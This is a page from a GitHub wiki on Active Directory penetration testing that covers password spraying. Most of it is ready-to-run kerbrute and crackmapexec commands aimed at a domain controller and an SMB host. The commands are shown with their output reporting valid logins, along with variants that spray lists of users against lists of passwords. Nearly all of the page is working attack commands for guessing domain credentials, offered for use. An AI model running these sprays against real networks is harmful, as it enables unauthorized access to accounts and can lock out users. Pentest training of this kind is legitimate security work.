Password Spray - maxbirnbacher/ADPentesting101 GitHub Wiki

If you find default credentials, you can try a password spray

kerbrute

kerbrute (version v1.0.3) has a password spray feature that takes a list of users and one password (use ')

./kerbrute passwordspray --dc 172.27.12.20 -d tophack.local found_usernames.txt 'ChangeM3!N0w'

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/23/24 - Ronnie Flathers @ropnop

2024/04/23 08:53:36 >  Using KDC(s):
2024/04/23 08:53:36 >   172.27.12.20:88

2024/04/23 08:53:37 >  [+] VALID LOGIN:  [email protected]:ChangeM3!N0w
2024/04/23 08:53:37 >  Done! Tested 7 logins (1 successes) in 0.121 seconds

crackmapexec

If kerbrute does not work (happens sometime) use crackmapexec.

crackmapexec smb 192.168.200.2 -u usernames.txt -p 'Changeme123!'
SMB         192.168.200.2   445    WIN-9DMEA2KARL9  [*] Windows 10.0 Build 20348 x64 (name:WIN-9DMEA2KARL9) (domain:domain.local) (signing:True) (SMBv1:False)
SMB         192.168.200.2   445    WIN-9DMEA2KARL9  [+] domain.local\Opaline.Herta:Changeme123!

crackmapexec can also be used to spray a list of users in combination with a list of passwords:

crackmapexec smb <IP> -u usernames.txt -p passwords.txt

Or use a designated username and password combination:

crackmapexec smb <IP> -u 'user' -p 'password'